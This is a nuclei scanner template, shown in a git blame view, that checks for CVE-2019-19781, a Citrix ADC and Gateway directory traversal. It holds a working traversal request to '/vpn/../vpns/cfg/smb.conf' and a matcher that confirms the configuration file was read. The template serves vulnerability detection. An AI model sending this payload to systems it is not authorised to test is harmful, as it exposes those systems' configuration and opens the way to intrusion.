nuclei-templates/cves/2019/CVE-2019-19781.yaml

19 lines
513 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-19781
2020-04-05 22:27:04 +00:00
info:
name: Citrix ADC Directory Traversal
author: organiccrap
severity: high
2021-03-26 06:47:35 +00:00
description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
reference: https://support.citrix.com/article/CTX267027
2021-03-18 07:54:36 +00:00
tags: cve,cve2019,citrix,lfi
2020-04-05 22:27:04 +00:00
requests:
- method: GET
2020-05-25 07:49:06 +00:00
path:
2020-04-05 22:27:04 +00:00
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
matchers:
- type: word
2020-05-25 07:49:06 +00:00
words:
- "[global]"